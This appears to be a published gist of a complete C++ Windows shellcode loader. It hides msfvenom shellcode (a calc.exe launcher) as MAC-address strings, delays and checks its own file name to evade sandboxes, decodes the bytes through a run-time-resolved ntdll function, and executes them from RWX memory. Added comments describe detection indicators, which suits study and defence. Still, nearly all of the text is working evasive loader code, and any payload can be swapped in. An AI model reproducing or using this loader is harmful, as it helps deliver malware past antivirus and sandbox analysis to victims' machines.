Simple sandbox evasion that checks whether the executable's name appears in its own file path.
// Payload encoding using HellsShell (https://github.com/NUL0x4C/HellShell) | |
// Compile with clang: clang++ -w -Oz -mwindows itsnotmalware.cpp -o itsnotmalware.exe | |
#include "Windows.h" | |
#include "stdio.h" | |
#include <iostream> | |
#include <string> | |
#include <regex> | |
// NOTE(review): _CRT_SECURE_NO_WARNINGS is defined *after* the CRT headers above have already
// been included, so it cannot affect them; the #pragma on the next line is what actually
// silences the MSVC deprecation warnings.
#define _CRT_SECURE_NO_WARNINGS | |
#pragma warning(disable:4996) | |
// Iteration count for the delay loop in checkSandbox(); the loop has no other effect.
#define MAX_OP 89888996 // Define a constant MAX_OP with a value of 89888996 | |
using namespace std; | |
// msfvenom calc.exe | |
// Payload table: 46 strings, each holding six dash-separated hex bytes in MAC-address
// notation. MacDeobfuscation() converts them back-to-back into 46 * 6 = 276 raw bytes.
// NumberOfElements below must equal the number of entries here; nothing verifies this.
// Defender note: a string table of MAC-formatted hex sextets next to a run-time lookup of
// RtlEthernetStringToAddressA is a static signature for this loader style.
char* MacArray[] = { | |
"FC-48-83-E4-F0-E8", "C0-00-00-00-41-51", "41-50-52-51-56-48", "31-D2-65-48-8B-52", "60-48-8B-52-18-48", "8B-52-20-48-8B-72", | |
"50-48-0F-B7-4A-4A", "4D-31-C9-48-31-C0", "AC-3C-61-7C-02-2C", "20-41-C1-C9-0D-41", "01-C1-E2-ED-52-41", "51-48-8B-52-20-8B", | |
"42-3C-48-01-D0-8B", "80-88-00-00-00-48", "85-C0-74-67-48-01", "D0-50-8B-48-18-44", "8B-40-20-49-01-D0", "E3-56-48-FF-C9-41", | |
"8B-34-88-48-01-D6", "4D-31-C9-48-31-C0", "AC-41-C1-C9-0D-41", "01-C1-38-E0-75-F1", "4C-03-4C-24-08-45", "39-D1-75-D8-58-44", | |
"8B-40-24-49-01-D0", "66-41-8B-0C-48-44", "8B-40-1C-49-01-D0", "41-8B-04-88-48-01", "D0-41-58-41-58-5E", "59-5A-41-58-41-59", | |
"41-5A-48-83-EC-20", "41-52-FF-E0-58-41", "59-5A-48-8B-12-E9", "57-FF-FF-FF-5D-48", "BA-01-00-00-00-00", "00-00-00-48-8D-8D", | |
"01-01-00-00-41-BA", "31-8B-6F-87-FF-D5", "BB-F0-B5-A2-56-41", "BA-A6-95-BD-9D-FF", "D5-48-83-C4-28-3C", "06-7C-0A-80-FB-E0", | |
"75-05-BB-47-13-72", "6F-6A-00-59-41-89", "DA-FF-D5-63-61-6C", "63-2E-65-78-65-00" | |
}; | |
// Number of entries in MacArray (must be kept in sync with the table above by hand).
#define NumberOfElements 46 | |
// Function-pointer type matching ntdll's RtlEthernetStringToAddressA(S, Terminator, Addr):
// parses the MAC-address string S and writes its 6 bytes to Addr (MacDeobfuscation() advances
// its output pointer by 6 after each call); returns an NTSTATUS, 0 meaning success.
// Declared locally because the export is resolved at run time with GetProcAddress rather
// than linked through the import table.
typedef NTSTATUS(NTAPI* fnRtlEthernetStringToAddressA)( | |
PCSTR S, | |
PCSTR* Terminator, | |
PVOID Addr | |
); | |
// Returns TRUE only when the full path of the running module matches "(.*)(itsnotmalware)(.*)",
// i.e. contains the substring "itsnotmalware"; returns FALSE in every other case.
// The counting loop always leaves cpt == MAX_OP, so the branch guarding the path check is
// always taken; its only effect is to spend MAX_OP iterations before any real work
// (presumably a delay aimed at instruction-budgeted emulators — the gist calls this sandbox
// evasion, the code itself does not say).
// Defender note: a long no-op loop followed by a self-path/name check is a recognizable
// evasion pattern; an analysis run that renames the sample takes the FALSE branch and sees
// nothing beyond the "[-] Name of the program..." message printed by main().
BOOL checkSandbox() { | |
char path [MAX_PATH]; // Declare a character array to hold the file path | |
int cpt = 0; | |
int i = 0; | |
// Delay loop: cpt is incremented exactly MAX_OP times and compared against MAX_OP below.
for (i = 0; i < MAX_OP; i++) | |
{ | |
cpt++; | |
} | |
if (cpt == MAX_OP) | |
{ | |
// NULL module handle = the running executable itself; return value (length/failure) is not checked.
GetModuleFileName(NULL, path, MAX_PATH); | |
regex str_expr ("(.*)(itsnotmalware)(.*)"); // Regex to find "itsnotmalware" | |
if (regex_match (path,str_expr)) // Check if the file path matches the regular expression pattern | |
{ | |
return TRUE; | |
} | |
return FALSE; | |
} | |
return FALSE; | |
} | |
// Converts every entry of MacArray (a "XX-XX-XX-XX-XX-XX" string) into its 6 raw bytes using
// ntdll!RtlEthernetStringToAddressA, resolved at run time via GetModuleHandle/GetProcAddress,
// and writes the results back to back into a process-heap buffer of NmbrOfElements * 6 bytes.
// Params:  MacArray       - array of NmbrOfElements MAC-formatted strings
//          NmbrOfElements - number of entries in MacArray
//          ppDAddress     - receives the decoded buffer (HeapAlloc'd, caller-owned)
//          pDSize         - receives the buffer size in bytes
// Returns TRUE on success; FALSE if the export lookup, the allocation or any single
// conversion fails (an error line is printed first).
// Defender note: resolving RtlEthernetStringToAddressA dynamically keeps it out of the import
// table, so the call is only visible in API/ETW telemetry or as a string in the binary; the
// string itself (and "NTDLL") are useful static indicators.
BOOL MacDeobfuscation(IN CHAR* MacArray[], IN SIZE_T NmbrOfElements, OUT PBYTE * ppDAddress, OUT SIZE_T * pDSize) { | |
PBYTE pBuffer = NULL, | |
TmpBuffer = NULL; | |
SIZE_T sBuffSize = NULL; | |
PCSTR Terminator = NULL; | |
NTSTATUS STATUS = NULL; | |
// Run-time resolution of the ntdll export (see the typedef above).
fnRtlEthernetStringToAddressA pRtlEthernetStringToAddressA = (fnRtlEthernetStringToAddressA)GetProcAddress(GetModuleHandle(TEXT("NTDLL")), "RtlEthernetStringToAddressA"); | |
if (pRtlEthernetStringToAddressA == NULL) { | |
printf("[!] GetProcAddress Failed With Error : %d \n", GetLastError()); | |
return FALSE; | |
} | |
// One MAC string decodes to exactly 6 bytes.
sBuffSize = NmbrOfElements * 6; | |
pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), 0, sBuffSize); | |
if (pBuffer == NULL) { | |
printf("[!] HeapAlloc Failed With Error : %d \n", GetLastError()); | |
return FALSE; | |
} | |
TmpBuffer = pBuffer; | |
for (int i = 0; i < NmbrOfElements; i++) { | |
// Non-zero NTSTATUS = conversion failure; Terminator (end-of-parse pointer) is never inspected.
if ((STATUS = pRtlEthernetStringToAddressA(MacArray[i], &Terminator, TmpBuffer)) != 0x0) { | |
printf("[!] RtlEthernetStringToAddressA Failed At [%s] With Error 0x%0.8X\n", MacArray[i], STATUS); | |
return FALSE; | |
} | |
TmpBuffer = (PBYTE)(TmpBuffer + 6); | |
} | |
*ppDAddress = pBuffer; | |
*pDSize = sBuffSize; | |
return TRUE; | |
} | |
// Entry point. Exits with -1 unless checkSandbox() passes, decodes the MAC-formatted table into
// a heap buffer, copies it into a freshly VirtualAlloc'd PAGE_EXECUTE_READWRITE region and
// transfers control to it through a function pointer. Returns -1 on either early exit and 0
// otherwise; control only comes back here if the executed bytes return.
// Defender note: private RWX allocation + memcpy + indirect call into non-image-backed memory
// is the canonical self-injecting loader sequence and is what memory-scanning and
// unbacked-executable-region detections key on. The VirtualAlloc result is used without a
// NULL check, and neither buffer is ever released.
int main() { | |
PBYTE pDeobfuscatedPayload = NULL; | |
SIZE_T sDeobfuscatedSize = NULL; | |
if (!checkSandbox()) { | |
printf("[-] Name of the program running is different...exit...\n"); | |
return -1; | |
}; | |
// Decode the shellcode | |
if (!MacDeobfuscation(MacArray, NumberOfElements, &pDeobfuscatedPayload, &sDeobfuscatedSize)) { | |
printf("[-] Decoding error!\n"); | |
return -1; | |
} | |
// Allocate memory for the decrypted MSF-Shellcode | |
// RWX in one step (no RW -> RX transition); the return value is not checked before use.
void* exec = VirtualAlloc(0, sDeobfuscatedSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
// Copy the MSF-Shellcode into the allocated memory | |
memcpy(exec, pDeobfuscatedPayload, sDeobfuscatedSize); | |
// Execute the decrypted MSF-Shellcode in memory | |
((void(*)())exec)(); | |
return 0; | |
} |